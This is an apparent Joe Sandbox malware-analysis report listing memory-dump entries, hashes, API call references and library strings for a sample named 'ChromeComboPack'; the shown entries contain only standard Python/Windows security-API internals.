                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Authority$CountErrorIdentifierLastValid
                                                                                                                                                                                                                                                • String ID: %lu$-%lu$0x%02hx%02hx%02hx%02hx%02hx%02hx$S-%lu-
                                                                                                                                                                                                                                                • API String ID: 228009767-531523367
                                                                                                                                                                                                                                                • Opcode ID: b339956fccc20c37dc137844cdfb54516e25dbc4dbc000efbe68bd1d43e75f9a
                                                                                                                                                                                                                                                • Instruction ID: 6d49467d3e90698df70903af50fc22826dddb97765dd002b448140dcc13b3c83
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b339956fccc20c37dc137844cdfb54516e25dbc4dbc000efbe68bd1d43e75f9a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C51D067B09BD192E7698F15A46427A7FA0FB85B85F448076DE8E43764DF3CE448CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: String$Err_$AllocBytes_CharTaskWide$ByteFormatFreeMem_MultiSizeUnicode_memcpy
                                                                                                                                                                                                                                                • String ID: <NULL!!>$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$value is larger than a DWORD
                                                                                                                                                                                                                                                • API String ID: 1531658785-4125661472
                                                                                                                                                                                                                                                • Opcode ID: 66ce21fda171c5b8bf048c3557db498c30436750ed0329add0b3282728a1211c
                                                                                                                                                                                                                                                • Instruction ID: 649f26c11e0db23ab95d6680aa3a7a17bee8b4d81ff82b0fce8b587204a0530c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66ce21fda171c5b8bf048c3557db498c30436750ed0329add0b3282728a1211c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D413036B0BB42A6EA588F15E5642797BA1FF88B84F884175DA4E43755DF3CF449C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: String$Err_$AllocBytes_CharTaskWide$ByteFormatFreeMem_MultiSizeUnicode_memcpy
                                                                                                                                                                                                                                                • String ID: <NULL!!>$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$value is larger than a DWORD
                                                                                                                                                                                                                                                • API String ID: 1531658785-4125661472
                                                                                                                                                                                                                                                • Opcode ID: 8f9c573c28dfd467008a411df4f1904d4481c3806688cbfaab18af106475a5a8
                                                                                                                                                                                                                                                • Instruction ID: ebef7ad1f8ec439314436d63e742c06d6de760296bd01d34d069c692eb28bc72
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f9c573c28dfd467008a411df4f1904d4481c3806688cbfaab18af106475a5a8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56413937B1AB52A1FA58CF15E4642786BA0BF88B85F8845B6DA4E43754DF3CF40AC341
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CheckErr_Mapping_String
                                                                                                                                                                                                                                                • String ID: Object must be a mapping (dictionary, class instance, etc$__dict__
                                                                                                                                                                                                                                                • API String ID: 1486305882-910247860
                                                                                                                                                                                                                                                • Opcode ID: 612e479974e9f190fc4ca7c05ebc1e853e37b3b18ce9a82dd099f0befac20253
                                                                                                                                                                                                                                                • Instruction ID: ec2fe957cd53c60cb426d79007b39cd4caff0c050d8a6e30eca1b38e26cf6f5d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 612e479974e9f190fc4ca7c05ebc1e853e37b3b18ce9a82dd099f0befac20253
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B313022B0BA4296EA598F56A864139ABA0FF89F95F4C5074DE4E47764DF3CF485C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PyErr_Format.PYTHON312 ref: 00007FFD8A193046
                                                                                                                                                                                                                                                • PyErr_SetString.PYTHON312 ref: 00007FFD8A1930AD
                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00007FFD8A193114
                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32 ref: 00007FFD8A193130
                                                                                                                                                                                                                                                • PyErr_Format.PYTHON312 ref: 00007FFD8A19315B
                                                                                                                                                                                                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFD8A19316B
                                                                                                                                                                                                                                                • PyErr_Format.PYTHON312 ref: 00007FFD8A193190
                                                                                                                                                                                                                                                • memset.VCRUNTIME140 ref: 00007FFD8A1931A3
                                                                                                                                                                                                                                                • memcpy.VCRUNTIME140 ref: 00007FFD8A1931B3
                                                                                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFD8A193218
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C0AB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C11A
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: PyUnicode_DecodeMBCS.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C1EB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: _Py_BuildValue_SizeT.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C200
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C218
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: PyErr_SetObject.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C22D
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: _Py_Dealloc.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C23C
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_$Format$ErrorLast$BuildDeallocDecodeFreeLengthLocalMessageObjectSizeStringUnicode_Value_freemallocmemcpymemset
                                                                                                                                                                                                                                                • String ID: %s not supported by this version of Windows$%s: adding ACE would put ACL over size limit$%s: unable to allocated %d bytes$The object is not a PySID object
                                                                                                                                                                                                                                                • API String ID: 4156918035-1709335586
                                                                                                                                                                                                                                                • Opcode ID: 308fc0bfe6fe7bda254db686d5e7a50097f48a6ab125105c17bb65d5ddd64eb2
                                                                                                                                                                                                                                                • Instruction ID: 072e412aea2be940178287244382b3de5375dec445764b581b7dec046dd2d163
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 308fc0bfe6fe7bda254db686d5e7a50097f48a6ab125105c17bb65d5ddd64eb2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30619827B0EA42A1EA689F22E96067A6BA0FF88FC4F984075DD4D47B55DF3CE445C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Long$FromLong_Unsigned$BuildSizeValue_
                                                                                                                                                                                                                                                • String ID: OtherOperationCount$OtherTransferCount$ReadOperationCount$ReadTransferCount$WriteOperationCount$WriteTransferCount${s:N,s:N,s:N,s:N,s:N,s:N}
                                                                                                                                                                                                                                                • API String ID: 3939590852-408589094
                                                                                                                                                                                                                                                • Opcode ID: c98b3276037aab841400b000af896ada310c42ae489b673823bfa69c289be3b2
                                                                                                                                                                                                                                                • Instruction ID: a2de194bbcf4c35a754e90e33e779e5b7c267ffa66e1e496b190f27822c91c19
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c98b3276037aab841400b000af896ada310c42ae489b673823bfa69c289be3b2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD21F036A1AF56A6DA04CB11F8944697BB8FB88B90B510272EE9D43724EF3CE155CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                                                • String ID: %s not supported by this version of Windows$%s: adding ACE would put ACL over size limit$%s: unable to allocated %d bytes$The object is not a PySID object
                                                                                                                                                                                                                                                • API String ID: 1450464846-1709335586
                                                                                                                                                                                                                                                • Opcode ID: 33818feda3cc014b957c6b151036ecc04b214d1a4c29feecf4a7cc7c90388e06
                                                                                                                                                                                                                                                • Instruction ID: 2dab77f00a51398abf1ee540d37fc65e9072eeba65fe84dd1a5cdac5e7bd7e9b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33818feda3cc014b957c6b151036ecc04b214d1a4c29feecf4a7cc7c90388e06
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B513027B0AB42A2E7589F16A86057ABBA0FF88FC4F984471DD4E47B55DE3CE445C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                                                • String ID: %s not supported by this version of Windows$%s: adding ACE would put ACL over size limit$%s: unable to allocated %d bytes$The object is not a PySID object
                                                                                                                                                                                                                                                • API String ID: 1450464846-1709335586
                                                                                                                                                                                                                                                • Opcode ID: 1e022e470222c007c52509349f617818019dffee254f32b8763a13ec9a428511
                                                                                                                                                                                                                                                • Instruction ID: c2e91a631ff498b7d633399cff0a9a4fdd9b9ac13a905e767fb0fd9a7d654d71
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e022e470222c007c52509349f617818019dffee254f32b8763a13ec9a428511
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6518127B0AA57A2EB589F16A870579ABA1BF88FC4F884071DD4E47B64DE3CE445C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_$DeallocFormatSequence_StringTuple
                                                                                                                                                                                                                                                • String ID: Sequence can contain at most %d items$Sequence of dwords cannot be None$Unable to allocate %d bytes
                                                                                                                                                                                                                                                • API String ID: 3107502305-158408534
                                                                                                                                                                                                                                                • Opcode ID: 5b349e25c7462d1a215725f54d91a1bc1a1f425adf9fc773b27ac9dc6a667d2c
                                                                                                                                                                                                                                                • Instruction ID: 6082732ee9649b0223c158c6b502873937a0bd6b99c1d250bfecca1fe4556306
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b349e25c7462d1a215725f54d91a1bc1a1f425adf9fc773b27ac9dc6a667d2c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57412E37B0AB429AEA59CF15E8645787BA4FB88B94F494071CE9D43760EF3CE485C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • IsValidSecurityDescriptor.ADVAPI32(?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A197780
                                                                                                                                                                                                                                                • PyErr_SetString.PYTHON312(?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19779B
                                                                                                                                                                                                                                                • GetSecurityDescriptorLength.ADVAPI32(?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A1977B6
                                                                                                                                                                                                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A1977C4
                                                                                                                                                                                                                                                • MakeSelfRelativeSD.ADVAPI32(?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A1977DD
                                                                                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A1977EE
                                                                                                                                                                                                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A1977FE
                                                                                                                                                                                                                                                • PyErr_Format.PYTHON312(?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A197822
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DescriptorErr_Securitymalloc$FormatLengthMakeRelativeSelfStringValidfree
                                                                                                                                                                                                                                                • String ID: Invalid Security descriptor$MakeSelfRelativeSD$Unable to allocate %d bytes
                                                                                                                                                                                                                                                • API String ID: 1101611553-2210018374
                                                                                                                                                                                                                                                • Opcode ID: cdd9a8532c88bff841c07cfd6c696265eb762b888d14b7727aee3e3aa6988e8e
                                                                                                                                                                                                                                                • Instruction ID: 341a0f964160c7384fb0f0bc48adf840a90d46c0fa71f4ec6f69fa1cbe0f0eb1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cdd9a8532c88bff841c07cfd6c696265eb762b888d14b7727aee3e3aa6988e8e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE316227B0AA4192EB488F25F46437967A0FF88F84F484071DA4E87758DF3CE445C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_Formatmalloc
                                                                                                                                                                                                                                                • String ID: Ace type %d is not supported yet$Error reordering ACL: Unable to allocate acl of size %d$ReorderACL
                                                                                                                                                                                                                                                • API String ID: 1659041409-545600788
                                                                                                                                                                                                                                                • Opcode ID: c18d9d8ae7d97ae56a7e08c44d8be784a2ee1578bc8d9adb9b86b188d5208fff
                                                                                                                                                                                                                                                • Instruction ID: ccb53a8dff7d6b3d926d7729a7891a7c8e15d6302f6e36d0233a5d8dfc29d58f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c18d9d8ae7d97ae56a7e08c44d8be784a2ee1578bc8d9adb9b86b188d5208fff
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F151C527B0D69295E7A88F26A06427AFBE1FB89F84F884075DD8D43754CE3CE085C740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DeallocErr_StringUnicode_
                                                                                                                                                                                                                                                • String ID: Internal$InternalHigh$The object is not a PyHANDLE object$can't delete OVERLAPPED attributes$hEvent
                                                                                                                                                                                                                                                • API String ID: 3427960318-2811562281
                                                                                                                                                                                                                                                • Opcode ID: 4afe078daea3ad5df394d0a962044eaf008b59984f3ff696577ffb95ab0c4951
                                                                                                                                                                                                                                                • Instruction ID: be9fbbc4e6029f410a4ed8a91c5389b0091ab9963e260d384ad442625552dfd4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4afe078daea3ad5df394d0a962044eaf008b59984f3ff696577ffb95ab0c4951
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0413323B0EA42A1EA588F16EA601797BA0FB85B94F9841B1DE5F47795EF2CF450C310
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_String$FormatUnicode_
                                                                                                                                                                                                                                                • String ID: Expected 'bytes', got '%s'$None is not a valid string in this context$value is larger than a DWORD
                                                                                                                                                                                                                                                • API String ID: 744494611-3495899980
                                                                                                                                                                                                                                                • Opcode ID: 05216bfa44e7ee20cd62210ca1a8a19d3a1d4b56492e3c42796aad6ce1c811f1
                                                                                                                                                                                                                                                • Instruction ID: ee0c6b2a6d394594669d28d2d88cf8baba0d371ac92b6f2a952734d9928ff9f6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05216bfa44e7ee20cd62210ca1a8a19d3a1d4b56492e3c42796aad6ce1c811f1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA416223B0BB52A6EA589F16E8641796BA1BF88FC4F984072DD0E47754DE3DE489C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
